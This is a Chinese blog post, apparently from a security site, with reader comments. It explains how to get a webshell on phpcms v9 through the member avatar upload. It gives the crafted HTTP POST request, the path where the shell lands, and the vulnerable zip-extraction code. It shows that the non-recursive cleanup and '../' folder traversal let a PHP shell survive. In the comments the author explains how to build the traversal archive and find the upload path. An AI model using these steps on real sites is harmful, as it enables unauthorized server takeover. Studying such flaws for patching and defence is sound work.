phpcms v9前台会员中心上传头像可getshell

这个算杂记吧。难得老衲啰嗦一次。最开始是11月27号,突然看到一枚补丁。说是前台上传头像可getshell.立马被吸引住了。通过两份补丁的对比,发现在处理压缩包的过程中出现了一段删除当前文件夹下的全部文件夹。然后就菊花一紧。通过通读代码,发现上传的过程是

用户上传头像---通过flash里面的js把当前的头像处理成三张不同的格式,然后压缩

用户点击保存的时候把当前的压缩包直接上传的解包的位置,然后把图像释放出来。然后删除临时文件

利用过程就出来了,上传图片,然后在点击保存的时候进行抓包。然后发送的内容为自己的。

常用的就是burp,把包的内容给清理掉.替换为自己的,构造包的内容为带文件夹的。然后上传就可以了。
1:利用过程
头像上传
[php]
POST /coder/phpcms/phpsso_server/index.php?m=phpsso&c=index&a=uploadavatar&auth_data=v=1&appid=1&data=dc64BlNRU1UCCAkCVVpUBgcHCVIHUFdTVVZRCVcUD1RfBRBGED4CEEZQZlkAQVxdEjVsVRJVB0MOKn4JUTEPBTQFDlVXLAocQG9SUQlzJA HTTP/1.1
Host: w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: pIbCO_auth=7d75AlZVBwEJUQJRAVUOBQ5dAVMGUFZQA1UGAFdfBgBVMGJ0MCRmeHwgczdnMwhrezJfe3o0W2hXdXFpMiQBXFAkdWQyKnZwaSJ0K2knVXRqJl93fidmfFJ1ZnkwJGFXezBUXjIzQHB%2FI3MCdCdod30; pIbCO__userid=0389UVEEA1YFAlYDBVYBXgBXVwZbVgtaUVsAVQdU; pIbCO__username=3a02CFUBAFEJAQQFAANRDlwAB1xXXAIJVVULAwhRQloNS0Q; pIbCO__nickname=aaedBQYHAAEJAVYHAlcDVQkAVQ0MCVAIUANaUl1QQFENQEU; pIbCO__groupid=c88fBAEHVFZUUVYAVFdSAAJdUFQLCFcHBwlQAFoK; pgv_pvi=3195626496; KB705_uid=1; KB705_hash=4f323b42; KB705_subject_1=a%3A1%3A%7Bi%3A1%3Bs%3A4%3A%22xxxx%22%3B%7D; CNZZDATA1670348=cnzz_eid%3D1956334698-1385137117-http%253A%252F%252Fw%26ntime%3D1385196897%26cnzz_a%3D26%26ltime%3D1385196895825%26rtime%3D1; CKFinder_Path=upload%3A%2F%3A1; bdshare_firstime=1385212437421; PHPSESSID=56r0gabfklka4tfg6g4gr957h5
Connection: keep-alive
Referer: http://0day5.com/phpcms/phpsso_server/statics/images/main.swf
Content-type: application/octet-stream
Content-Length: 26847
PK
[/php]
v9
选择特定的 zip 压缩文件 点击 forward 即可
然后 shell的 目录为 phpsso_server/uploadfile/avatar/1/1/1/21/1/info.php

红色值为 个人id 根据burp 返回的数据可以看到
2:漏洞分析
phpsso_server\phpcms\modules\phpsso\index.php
[php]
//存储flashpost图片
$filename = $dir.$this->uid.'.zip';
file_put_contents($filename, $this->avatardata);

//此时写入压缩文件夹内容

//解压缩文件
pc_base::load_app_class('pclzip', 'phpsso', 0);
$archive = new PclZip($filename);
if ($archive->extract(PCLZIP_OPT_PATH, $dir) == 0) {
die("Error : ".$archive->errorInfo(true));
}

//568 行

//判断文件安全,删除压缩包和非jpg图片
$avatararr = array('180x180.jpg', '30x30.jpg', '45x45.jpg', '90x90.jpg');
if($handle = opendir($dir)) {
while(false !== ($file = readdir($handle))) {
if($file !== '.' && $file !== '..') {
if(!in_array($file, $avatararr)) {
@unlink($dir.$file);
} else {
$info = @getimagesize($dir.$file);
if(!$info || $info[2] !=2) {
@unlink($dir.$file);
}
}
}
}[/php]
梳理下文件上传流程 把post 过来的zip内容吸入 zip文件 -> 解压 ->清除非图片文件
漏洞就出在了最后一步 检查文件文件内容的时候 没有递归 也没有删除文件夹
尼玛 狗血有木有 zip文件夹中里面在新建个文件夹 这样就绕过的检测 shell到手

然后在车上的时候就在想这个怎么图片,在ssh连接服务器执行 cd ..的时候突然想到,如果我们构造的包是../的文件夹呢~客观你说是吧。然后华丽丽的第二次突破就毫无节操的成功了。

12 条评论

  1. apple

    请问怎么 构造那种的文件夹

    1. 0day5
      @apple

      用UE之类的编辑

  2. android

    已经解决了,谢谢。

    1. apple
      @android

      请问怎么做?

  3. android

    请问‘如果我们构造的包是../的文件夹呢’,如何构造这种类型的文件夹?

    1. 0day5
      @android

      先创建一个很长名字的文件夹,看你翻几层目录,然后zip打包,之后用UE32之类的编辑器编辑

      1. android
        @0day5

        感谢您的回复,还是不太明白您说的操作,能不能给些例子或是说明文章的网址,再次感谢。

  4. abc

    博主你好:
    请问怎么确定上传后的路径呢?修改的内容是否是PK以后的所有信息包括PK?

    1. 0day5
      @abc

      传两次,第一次确定路径,第二次根据第一次去查找。修改全部的pk信息

  5. […] http://0day5.com/archives/933 […]

  6. malayke

    博主你好:
    看到你这篇文章我有个问题:
    你说“最开始是11月27号,突然看到一枚补丁。说是前台上传头像可getshell.立马被吸引住了。通过两份补丁的对比。。。。”
    我想知道你是怎么对比补丁的 是把补丁下载下来然后和源文件进行对比么,这样发现问题的方法有哪些技巧,博主能否说说?

    1. 0day5
      @malayke

      有很多文件对比的脚本或者是文件。我的办法比较笨,直接使用ue的某个功能去挨个对比的

发表评论